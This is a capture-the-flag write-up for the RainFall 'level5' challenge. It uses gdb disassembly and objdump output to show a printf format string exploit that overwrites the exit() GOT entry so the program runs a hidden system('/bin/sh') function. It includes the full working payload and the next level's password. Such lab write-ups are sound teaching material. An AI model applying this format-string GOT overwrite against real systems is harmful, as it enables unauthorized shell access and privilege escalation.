info variable
0x08049854  m

info function
0x080484a4  o
0x080484c2  n
0x08048504  main

(gdb) disas main
Dump of assembler code for function main:
   0x08048504 <+0>:		push   %ebp
   0x08048505 <+1>:		mov    %esp,%ebp
   0x08048507 <+3>:		and    $0xfffffff0,%esp
   0x0804850a <+6>:		call   0x80484c2 <n>
   0x0804850f <+11>:	leave  
   0x08048510 <+12>:	ret    
End of assembler dump.
(gdb) disas n
Dump of assembler code for function n:
   0x080484c2 <+0>:		push   %ebp
   0x080484c3 <+1>:		mov    %esp,%ebp
   0x080484c5 <+3>:		sub    $0x218,%esp					; 536
   0x080484cb <+9>:		mov    0x8049848,%eax				; stdin
   0x080484d0 <+14>:	mov    %eax,0x8(%esp)
   0x080484d4 <+18>:	movl   $0x200,0x4(%esp)				; 512
   0x080484dc <+26>:	lea    -0x208(%ebp),%eax			; 520
   0x080484e2 <+32>:	mov    %eax,(%esp)
   0x080484e5 <+35>:	call   0x80483a0 <fgets@plt>
   0x080484ea <+40>:	lea    -0x208(%ebp),%eax			; 520
   0x080484f0 <+46>:	mov    %eax,(%esp)	
   0x080484f3 <+49>:	call   0x8048380 <printf@plt>		; prints buffer
   0x080484f8 <+54>:	movl   $0x1,(%esp)
   0x080484ff <+61>:	call   0x80483d0 <exit@plt>			; exit(1)
End of assembler dump.

-> we know there is a function o(), but it is not called
(gdb) disas o
Dump of assembler code for function o:
   0x080484a4 <+0>:		push   %ebp
   0x080484a5 <+1>:		mov    %esp,%ebp
   0x080484a7 <+3>:		sub    $0x18,%esp
   0x080484aa <+6>:		movl   $0x80485f0,(%esp)			; /bin/sh
   0x080484b1 <+13>:	call   0x80483b0 <system@plt>
   0x080484b6 <+18>:	movl   $0x1,(%esp)
   0x080484bd <+25>:	call   0x8048390 <_exit@plt>		; exit(1)
End of assembler dump.


The procedure linkage table (PLT) consists of many jump instructions, each one corresponding to
the address of a function. It works like a springboard—each time a shared function needs to be called, control will pass through the PLT.

level5@RainFall:~$ objdump -d -j .plt ./level5 
...
080483d0 <exit@plt>:
 80483d0:	ff 25 38 98 04 08    	jmp    *0x8049838
 80483d6:	68 28 00 00 00       	push   $0x28
 80483db:	e9 90 ff ff ff       	jmp    8048370 <_init+0x3c>
...
One of these jump instructions is associated with the exit() function,
which is called at the end of the program. If the jump instruction used for
the exit() function can be manipulated to direct the execution flow into
shellcode instead of the exit() function, a root shell will be spawned.

But the plt table is read-only.
The jump instruction reveals that it isn't jumping to an address but to a pointer to address.
For example, the actual address of the exit() function’s address is stored at 0x8049838.
These addresses exist in another section, called the global offset table (GOT),
which is writable.

level5@RainFall:~$ objdump -R ./level5 

./level5:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE 
08049814 R_386_GLOB_DAT    __gmon_start__
08049848 R_386_COPY        stdin
08049824 R_386_JUMP_SLOT   printf
08049828 R_386_JUMP_SLOT   _exit
0804982c R_386_JUMP_SLOT   fgets
08049830 R_386_JUMP_SLOT   system
08049834 R_386_JUMP_SLOT   __gmon_start__
08049838 R_386_JUMP_SLOT   exit
0804983c R_386_JUMP_SLOT   __libc_start_main

This reveals that the address of the exit() function is located in the GOT at 0x08049838.
If the address of the shellcode is over-written at this location, the program should call
the shellcode when it thinks it’s calling the exit() function.

We can use the printf format string vulnerability to write the function o's address instead
of the exit function address when it is called in function n().

-> Let's find in which position is does the m variable address starts.

level5@RainFall:~$ ./level5 
AAAA %x %x %x %x %x %x %x
AAAA 200 b7fd1ac0 b7ff37d0 41414141 20782520 25207825 78252078

It is on the 4th position.

-> exit:	0x08049838
-> o: 		0x080484a4 == 134513828 in decimal - 4bytes (for the exit address)
We have to print enough characters to reach the number that is the address of o.
-----------------------------------

Let's overwrite exit by o:
(python -c 'print ("\x38\x98\x04\x08" + "%134513824c" + "%4$n")'; cat -) | ./level5
pwd
/home/user/level5
whoami
level6
cat /home/user/level6/.pass
d3b7bf1025225bd715fa8ccb54ef06ca70b9125ac855aeab4878217177f41a31
